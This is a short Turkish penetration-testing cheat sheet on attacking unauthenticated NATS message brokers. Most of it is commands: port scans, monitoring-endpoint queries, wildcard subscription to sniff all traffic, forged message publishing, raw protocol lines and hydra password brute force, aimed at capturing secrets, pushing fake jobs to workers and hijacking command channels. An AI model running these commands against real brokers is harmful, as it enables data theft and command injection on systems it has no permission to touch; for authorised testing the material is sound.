4222 - Pentesting NATS
network messaging
NATS (4222/tcp, monitoring 8222) mesaj kuyruğudur. Auth kapalıysa tüm subject’lere pub/sub ile veri sızıntısı ve komut enjeksiyonu mümkündür.
Metodoloji
Section titled “Metodoloji”-
4222 ve 8222 monitoring portlarını doğrula.
-
Anonim bağlantı ve
INFObanner al. -
Subject wildcard subscribe ile trafik dinle.
-
Kritik subject’e sahte mesaj publish et.
nmap -Pn -sV -p4222,8222,6222 TARGETnc -nv TARGET 4222curl -sk http://TARGET:8222/varzcurl -sk http://TARGET:8222/connzcurl -sk http://TARGET:8222/subszClient bağlanma
Section titled “Client bağlanma”nats server check connection --server nats://TARGET:4222nats sub '>' --server nats://TARGET:4222nats pub demo.hi 'pwn' --server nats://TARGET:4222# auth varsa:nats sub '>' --server nats://user:pass@TARGET:4222Ham protokol
Section titled “Ham protokol”CONNECT {"verbose":false,"pedantic":false,"tls_required":false,"name":"pentest","lang":"go","version":"1.0"}SUB > 1PUB test 3pwnhydra -L users.txt -P rockyou.txt nats://TARGETMonitoring /varz içinde auth timeout ve connection ip'leri sızabilir- Credential/token subject'lerinden secret yakalama- Worker'lara sahte job publish- Service mesh komut kanalını hijackChecklist
Section titled “Checklist”[ ] 4222/8222 açık[ ] Anonim sub/pub[ ] Wildcard dinleme ile secret[ ] Sahte publish etkisi